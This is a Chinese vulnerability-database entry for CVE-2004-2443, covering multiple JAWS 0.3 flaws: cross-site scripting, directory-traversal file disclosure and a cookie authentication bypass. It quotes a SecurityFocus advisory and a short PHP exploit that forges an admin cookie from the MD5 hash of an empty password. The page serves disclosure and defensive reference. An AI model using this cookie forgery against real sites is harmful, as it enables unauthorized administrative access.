JAWS多个输入验证漏洞

JAWS多个输入验证漏洞

漏洞ID 1108028 漏洞类型 输入验证
发布时间 2004-07-06 更新时间 2005-10-20
图片[1]-JAWS多个输入验证漏洞-安全小百科CVE编号 CVE-2004-2443
图片[2]-JAWS多个输入验证漏洞-安全小百科CNNVD-ID CNNVD-200412-1154
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24256
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1154
|漏洞详情
Jaws0.3版本存在漏洞。远程攻击者借助空密码MD5哈希计算值设置为已登录cookie的admin.php中的HTTP请求绕过验证。该漏洞通过application.php的logged_on函数与登录会话变量比较。
|漏洞EXP
source: http://www.securityfocus.com/bid/10670/info
 
JAWS is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
 
JAWS is prone to a cross-site scripting vulnerability.
 
This cross-site scripting issue can permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If a user follows the malicious link, the attacker-supplied code executes in the Web browser of the victim computer. This attack can allow for theft of cookie-based authentication credentials and other attacks.
 
JAWS is reported to be prone to a file disclosure vulnerability. The vulnerability presents itself because directory traversal sequences "../.." are not correctly sanitized from user-supplied data. It is reported that an attacker may disclose a target file by including a relative path including directory traversal sequences to the target file as a value for URI parameters passed to the a JAWS script.
 
An authentication bypass vulnerability is reported to affect the JAWS authentication system. It is reported that an authentication cookie is derived from a known value, a remote attacker may create a cookie and use this cookie to authenticate to the system.

//BEGIN

//exploit.php
<?PHP
setcookie("logged","d41d8cd98f00b204e9800998ecf8427e",time()+86400*365,'path
to jaws');
?>

//END
|参考资料

来源:XF
名称:jaws-cookie-bypass-authentication(16622)
链接:http://xforce.iss.net/xforce/xfdb/16622
来源:BID
名称:10670
链接:http://www.securityfocus.com/bid/10670
来源:OSVDB
名称:7724
链接:http://www.osvdb.org/7724
来源:SECTRACK
名称:1010651
链接:http://securitytracker.com/id?1010651
来源:FULLDISC
名称:20040706MultiplesvulnerabilitiesinJAWS
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-07/0226.html

相关推荐: BEA WebLogic Server and Express Inadvertent Security Removal Weakness

BEA WebLogic Server and Express Inadvertent Security Removal Weakness 漏洞ID 1101533 漏洞类型 Design Error 发布时间 2002-10-01 更新时间 2002-10-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享